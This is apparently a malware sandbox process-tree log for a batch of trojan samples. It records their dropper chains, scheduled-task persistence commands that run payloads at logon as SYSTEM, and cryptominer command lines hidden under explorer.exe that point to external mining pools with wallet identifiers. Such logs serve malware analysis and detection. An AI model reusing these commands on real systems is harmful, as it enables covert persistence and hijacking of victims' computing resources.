        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit
        5⤵
        
        PID:10424
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5036
    - - C:\Users\Admin\Services32.exe
        
        "C:\Users\Admin\Services32.exe"
        5⤵
        
        PID:9852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit
        6⤵
        
        PID:10800
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:12224
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0x08A27f9952D74538Bf2FeFd985a1C42d736C5b24`@etc-eu1.nanopool.org:19999 --cinit-max-gpu=0 --response-timeout=300 --farm-retries=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-gpu=100 --cinit-stealth --cinit-etc --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6N6ZIN0x+xYCnkDXDrZYhNN3GfSSdRStWHrRQkJ3hPuJ"
        6⤵
        
        PID:8440
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-965b9b3de45c264762154b47fd04d6d28b63ea67ab48bedb215871c3d161696c.exe
    HEUR-Trojan.MSIL.Cryptos.gen-965b9b3de45c264762154b47fd04d6d28b63ea67ab48bedb215871c3d161696c.exe
    3⤵
    PID:11292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:5072
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5508
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      PID:4432
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:9604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:1092
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7184
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=30
        5⤵
        
        PID:6572
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-966d842921541b692c40c2148b9bb71429125bc3cb12e325df72ff8c492c3d92.exe
    HEUR-Trojan.MSIL.Cryptos.gen-966d842921541b692c40c2148b9bb71429125bc3cb12e325df72ff8c492c3d92.exe
    3⤵
    PID:5956
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:6244
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11360
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:5708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:11636
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11072
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=30
        5⤵
        
        PID:10732
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-2916c38c3ff4c0e36fbf895409db7b41fd9555cebf6a33cbf5867be8b54e73db.exe
    HEUR-Trojan.Win32.Crypt.gen-2916c38c3ff4c0e36fbf895409db7b41fd9555cebf6a33cbf5867be8b54e73db.exe
    3⤵
    PID:10412
  - - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      4⤵
      PID:7760
    - - C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\setup_install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\setup_install.exe"
        5⤵
        
        PID:10524
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        6⤵
        
        PID:9736
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_1.exe
        
        sonia_1.exe
        7⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_1.exe" -a
        8⤵
        
        PID:11308
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_2.exe
        6⤵
        
        PID:9996
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_2.exe
        
        sonia_2.exe
        7⤵
        
        PID:10968
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_3.exe
        6⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_3.exe
        
        sonia_3.exe
        7⤵
        
        PID:6848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_4.exe
        6⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_4.exe
        
        sonia_4.exe
        7⤵
        
        PID:6396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_5.exe
        6⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_5.exe
        
        sonia_5.exe
        7⤵
        
        PID:8964
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        6⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_6.exe
        
        sonia_6.exe
        7⤵
        
        PID:10084
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        6⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_7.exe
        
        sonia_7.exe
        7⤵
        
        PID:5684
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_8.exe
        6⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_8.exe
        
        sonia_8.exe
        7⤵
        
        PID:10352
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_9.exe
        6⤵
        
        PID:10444
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_9.exe
        
        sonia_9.exe
        7⤵
        
        PID:6496
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_10.exe
        6⤵
        
        PID:9636
        
        C:\Users\Admin\AppData\Local\Temp\7zS05E073BA\sonia_10.exe
        
        sonia_10.exe
        7⤵
        
        PID:9292
        
        C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        8⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        
        PID:9144
        
        C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        8⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        8⤵
        
        PID:8284
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10524 -s 584
        6⤵
        Program crash
        
        PID:1860
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-3065fb0aa4e0c395a18ba4c45e69282cc3eff4d95809a1ae6dcd51e48c2b9811.exe
    HEUR-Trojan.Win32.Crypt.gen-3065fb0aa4e0c395a18ba4c45e69282cc3eff4d95809a1ae6dcd51e48c2b9811.exe
    3⤵
    PID:8660
  - - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\setup_install.exe"
      4⤵
      PID:11864
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        5⤵
        
        PID:5892
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_1.exe
        
        sonia_1.exe
        6⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_1.exe" -a
        7⤵
        
        PID:11488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_2.exe
        5⤵
        
        PID:11620
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_2.exe
        
        sonia_2.exe
        6⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 392
        7⤵
        Program crash
        
        PID:7956
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_3.exe
        5⤵
        
        PID:7424
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_3.exe
        
        sonia_3.exe
        6⤵
        
        PID:10536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10536 -s 1776
        7⤵
        Program crash
        
        PID:10972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_4.exe
        5⤵
        
        PID:6240
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_4.exe
        
        sonia_4.exe
        6⤵
        
        PID:4788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_5.exe
        5⤵
        
        PID:9916
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_5.exe
        
        sonia_5.exe
        6⤵
        
        PID:12276
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        5⤵
        
        PID:5608
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_6.exe
        
        sonia_6.exe
        6⤵
        
        PID:11392
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        5⤵
        
        PID:5768
      - C:\Users\Admin\AppData\Local\Temp\7zS4D15DC8A\sonia_7.exe
        
        sonia_7.exe
        6⤵
        
        PID:2000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11864 -s 452
        5⤵
        Program crash
        
        PID:7124
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-374e79d7601a7ccab601d7c64bbffa573a94e0e3cd270c9046156c5025a341e2.exe
    HEUR-Trojan.Win32.Crypt.gen-374e79d7601a7ccab601d7c64bbffa573a94e0e3cd270c9046156c5025a341e2.exe
    3⤵
    PID:2004
  - - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\setup_install.exe"
      4⤵
      PID:5376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        5⤵
        
        PID:10912
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_1.exe
        
        sahiba_1.exe
        6⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_1.exe" -a
        7⤵
        
        PID:11424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        5⤵
        
        PID:5368
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_2.exe
        
        sahiba_2.exe
        6⤵
        
        PID:9352
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9352 -s 344
        7⤵
        Program crash
        
        PID:11656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        5⤵
        
        PID:8240
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_3.exe
        
        sahiba_3.exe
        6⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 1624
        7⤵
        Program crash
        
        PID:2012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_4.exe
        5⤵
        
        PID:3256
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_4.exe
        
        sahiba_4.exe
        6⤵
        
        PID:11564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_5.exe
        5⤵
        
        PID:2316
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_5.exe
        
        sahiba_5.exe
        6⤵
        
        PID:10132
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_6.exe
        5⤵
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_6.exe
        
        sahiba_6.exe
        6⤵
        
        PID:4060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        5⤵
        
        PID:5112
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_7.exe
        
        sahiba_7.exe
        6⤵
        
        PID:9912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_8.exe
        5⤵
        
        PID:4672
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_8.exe
        
        sahiba_8.exe
        6⤵
        
        PID:6888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_9.exe
        5⤵
        
        PID:6320
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_9.exe
        
        sahiba_9.exe
        6⤵
        
        PID:11416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_10.exe
        5⤵
        
        PID:2392
      - C:\Users\Admin\AppData\Local\Temp\7zS4D7826CA\sahiba_10.exe
        
        sahiba_10.exe
        6⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 564
        5⤵
        Program crash
        
        PID:10288
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-813ffce8015db19d68dfdaf4e6dc901b2430b13d7d7683794d008b2b30926cad.exe
    HEUR-Trojan.Win32.Crypt.gen-813ffce8015db19d68dfdaf4e6dc901b2430b13d7d7683794d008b2b30926cad.exe
    3⤵
    PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      4⤵
      PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\setup_install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\setup_install.exe"
        5⤵
        
        PID:9088
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        6⤵
        
        PID:1556
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_2.exe
        6⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_2.exe
        
        sonia_2.exe
        7⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 256
        8⤵
        Program crash
        
        PID:8724
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_3.exe
        6⤵
        
        PID:11092
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_3.exe
        
        sonia_3.exe
        7⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1028
        8⤵
        Program crash
        
        PID:11360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_4.exe
        6⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_4.exe
        
        sonia_4.exe
        7⤵
        
        PID:2016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_5.exe
        6⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_5.exe
        
        sonia_5.exe
        7⤵
        
        PID:5212
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        6⤵
        
        PID:12260
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_6.exe
        
        sonia_6.exe
        7⤵
        
        PID:508
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        6⤵
        
        PID:11348
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_7.exe
        
        sonia_7.exe
        7⤵
        
        PID:9504
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_8.exe
        6⤵
        
        PID:9324
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_8.exe
        
        sonia_8.exe
        7⤵
        
        PID:6648
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_9.exe
        6⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Local\Temp\7zS844B1AAA\sonia_9.exe
        
        sonia_9.exe
        7⤵
        
        PID:9136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_10.exe
        6⤵
        
        PID:8160
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-86d0f15a68722ea803b744c86f21cdcb28585dd3e01eb625a1d4dfc36800d580.exe
    HEUR-Trojan.Win32.Crypt.gen-86d0f15a68722ea803b744c86f21cdcb28585dd3e01eb625a1d4dfc36800d580.exe
    3⤵
    PID:3196
  - - C:\Windows\SysWOW64\calc.exe
      calc
      4⤵
      PID:11540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 264
      4⤵
      Program crash
      PID:3276
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-a16ed450732a91d7e929fa2ff06158c7160e3201123469e99abc0bd026dad44f.exe
    HEUR-Trojan.Win32.Crypt.gen-a16ed450732a91d7e929fa2ff06158c7160e3201123469e99abc0bd026dad44f.exe
    3⤵
    PID:9300
  - - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      4⤵
      PID:5064
    - - C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\setup_install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\setup_install.exe"
        5⤵
        
        PID:6980
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        6⤵
        
        PID:9392
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_1.exe
        
        sonia_1.exe
        7⤵
        
        PID:7464
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_1.exe" -a
        8⤵
        
        PID:9272
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_2.exe
        6⤵
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_2.exe
        
        sonia_2.exe
        7⤵
        
        PID:8912
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_3.exe
        6⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_3.exe
        
        sonia_3.exe
        7⤵
        
        PID:6264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 1028
        8⤵
        Program crash
        
        PID:5532
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_4.exe
        6⤵
        
        PID:10880
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_4.exe
        
        sonia_4.exe
        7⤵
        
        PID:3168
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_5.exe
        6⤵
        
        PID:8680
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_5.exe
        
        sonia_5.exe
        7⤵
        
        PID:6748
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        6⤵
        
        PID:8752
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_6.exe
        
        sonia_6.exe
        7⤵
        
        PID:1008
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        6⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_7.exe
        
        sonia_7.exe
        7⤵
        
        PID:10320
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_8.exe
        6⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_8.exe
        
        sonia_8.exe
        7⤵
        
        PID:7024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_9.exe
        6⤵
        
        PID:9348
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_9.exe
        
        sonia_9.exe
        7⤵
        
        PID:1588
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sonia_10.exe
        6⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\7zS8C3311DA\sonia_10.exe
        
        sonia_10.exe
        7⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 796
        8⤵
        Program crash
        
        PID:10092
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 564
        6⤵
        Program crash
        
        PID:4436
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-aa10745ba705fb6690fcf81dc02ba80a2bbecb00946a0005c424ff1a7c4c2212.exe
    HEUR-Trojan.Win32.Crypt.gen-aa10745ba705fb6690fcf81dc02ba80a2bbecb00946a0005c424ff1a7c4c2212.exe
    3⤵
    PID:11580
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-aa10745ba705fb6690fcf81dc02ba80a2bbecb00946a0005c424ff1a7c4c2212.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-aa10745ba705fb6690fcf81dc02ba80a2bbecb00946a0005c424ff1a7c4c2212.exe" -a
      4⤵
      PID:8272
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-bb9377d30a6a0abe24b7eca70250745afc078f116871bb94b5d617a207b37a9c.exe
    HEUR-Trojan.Win32.Crypt.gen-bb9377d30a6a0abe24b7eca70250745afc078f116871bb94b5d617a207b37a9c.exe
    3⤵
    PID:8148
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"
      4⤵
      PID:9056
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a
        5⤵
        
        PID:9292
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\note866.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\note866.exe"
      4⤵
      PID:7484
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-ee0ccd08f600cc81957b708aea0ca0a60189f8e36ee22f88c1e79b46a2472865.exe
    HEUR-Trojan.Win32.Crypt.gen-ee0ccd08f600cc81957b708aea0ca0a60189f8e36ee22f88c1e79b46a2472865.exe
    3⤵
    PID:5496
  - - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\setup_install.exe"
      4⤵
      PID:3540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        5⤵
        
        PID:7384
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_1.exe
        
        sahiba_1.exe
        6⤵
        
        PID:8208
        
        C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_1.exe" -a
        7⤵
        
        PID:11120
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        5⤵
        
        PID:6824
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_2.exe
        
        sahiba_2.exe
        6⤵
        
        PID:9200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 396
        7⤵
        Program crash
        
        PID:8252
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        5⤵
        
        PID:11980
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_3.exe
        
        sahiba_3.exe
        6⤵
        
        PID:10040
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10040 -s 1028
        7⤵
        Program crash
        
        PID:5172
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_4.exe
        5⤵
        
        PID:9448
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_4.exe
        
        sahiba_4.exe
        6⤵
        
        PID:12136
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_5.exe
        5⤵
        
        PID:6216
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_5.exe
        
        sahiba_5.exe
        6⤵
        
        PID:6344
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_6.exe
        5⤵
        
        PID:6720
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_6.exe
        
        sahiba_6.exe
        6⤵
        
        PID:7240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        5⤵
        
        PID:4872
